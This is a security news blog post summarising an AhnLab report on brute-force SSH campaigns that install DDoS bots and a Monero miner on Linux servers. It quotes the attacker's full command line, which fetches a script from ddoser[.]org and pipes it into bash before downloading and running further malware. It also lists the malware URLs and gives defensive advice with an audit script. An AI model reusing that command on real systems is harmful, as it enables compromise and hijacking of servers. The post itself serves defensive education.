Blog entry by Les Bell

by Les Bell - Wednesday, June 21, 2023, 7:19 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Attacks on Poorly-Secured Linux Servers via sshd

Security researchers at South Korea's AhnLab Security Emergency Response Center have uncovered a campaign being run by an unknown threat actor against poorly-managed Linux servers via the SSH daemon (sshd). Once the actor has gained initial access, they install a range of malware, including the Tsunami DDoS bot, ShellBot, the XMRig Monero cryptominer and Log Cleaner.

Initial access seems to be gained through a brute force attack using common weak credentials (seriously - who uses "abcdefghi" or "123@abc" as a password on the root account?). From this point, a command line is pasted in which downloads and runs a variety of malware:

# nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O - ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &

Some of the commands here are obviously meant to enumerate hardware such as GPUs, which could be used for cryptomining, and to profile the machine, while the wget commands download the attacker's malware and tools. One of these is a shell script called key which, when run, performs some cleanup and also inserts a public key into the compromised account's ~/.ssh/authorized_keys file, allowing the actor to persist even if the weak password is changed.

The other malware is:

Download URL                  Malware
ddoser[.]org/key              Downloader Bash
ddoser[.]org/logo             ShellBot DDoS Bot
ddoser[.]org/siwen/bot        ShellBot DDoS Bot
ddoser[.]org/siwen/a          Tsunami DDoS Bot
ddoser[.]org/siwen/cls        MIG Logcleaner v2.0
ddoser[.]org/siwen/clean      0x333shadow Log Cleaner
ddoser[.]org/siwen/ping6      Privilege escalation malware
ddoser[.]org/top              XMRig CoinMiner (compressed file)

ASEC's report provides a complete rundown on this list of malware.

There's an obvious lesson here: SSH is mostly used for system administration, and administrators should be smart enough to know better. Passwords are a losing proposition - weak passwords especially so - and setting up public-key authentication with OpenSSH and PuTTY is very easy, after which password logins can be disabled completely, by setting

PasswordAuthentication no

in /etc/ssh/sshd_config. After that, one can sleep easily, because this and similar distributed password brute-forcing campaigns will simply not work.
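As an added example (not code from the post or from ASEC's report), here is a small POSIX shell audit that covers both points above: it reports whether an sshd_config still permits password logins, and it lists any authorized_keys entry whose key is not on an allow-list of known administrator keys, which is what the key script described earlier would leave behind and which disabling passwords alone does not remove. File paths are parameters, and the sample files and key blobs are constructed placeholders.

```shell
#!/bin/sh
# Added example, not code from the original post or the ASEC report.
# Audits an sshd_config for password logins and lists authorized_keys
# entries that are not on an allow-list of known administrator keys.
# All paths are parameters; the sample files below are constructed.

# Effective PasswordAuthentication value: sshd uses the first uncommented
# occurrence of a keyword, and the OpenSSH default when it is unset is "yes".
password_auth_setting() {
    cfg="$1"
    val=$(grep -iE '^[[:space:]]*PasswordAuthentication[[:space:]]' "$cfg" \
            | head -n 1 | awk '{ print tolower($2) }')
    if [ -z "$val" ]; then val="yes"; fi
    printf '%s\n' "$val"
}

# Print every active authorized_keys line whose base64 key blob does not
# appear in the allow-list (key options and comment fields are ignored).
unknown_keys() {
    keys="$1"; allow="$2"
    grep -vE '^[[:space:]]*(#|$)' "$keys" | while IFS= read -r line; do
        blob=$(printf '%s\n' "$line" | grep -oE 'AAAA[A-Za-z0-9+/=]+' | head -n 1)
        if [ -n "$blob" ] && ! grep -qF -- "$blob" "$allow"; then
            printf '%s\n' "$line"
        fi
    done
}

# Constructed sample data (placeholder key blobs, not real keys).
demo_dir=$(mktemp -d)
printf '%s\n' '# constructed sshd_config' 'PubkeyAuthentication yes' \
    'PasswordAuthentication yes' > "$demo_dir/sshd_config"
printf '%s\n' 'ssh-ed25519 AAAAC3KNOWNADMINKEYPLACEHOLDER admin@bastion' \
    > "$demo_dir/known_keys"
printf '%s\n' 'ssh-ed25519 AAAAC3KNOWNADMINKEYPLACEHOLDER admin@bastion' \
    '# next line was never issued by the admins (constructed)' \
    'ssh-rsa AAAAB3UNKNOWNKEYPLACEHOLDER root@unknown' \
    > "$demo_dir/authorized_keys"

# Run both checks against a directory holding the three files.
audit() {
    printf 'PasswordAuthentication: %s\n' "$(password_auth_setting "$1/sshd_config")"
    printf 'authorized_keys entries not on the allow-list:\n'
    unknown_keys "$1/authorized_keys" "$1/known_keys"
}
audit "$demo_dir"
```

On a real host, point audit at /etc/ssh and a maintained allow-list of your administrators' public keys; an unexpected entry is worth treating as a compromise indicator rather than just deleting.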

Sanseo, Tsunami DDoS Malware Distributed to Linux SSH Servers, blog post, 20 June 2023. Available online at https://asec.ahnlab.com/en/54647/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
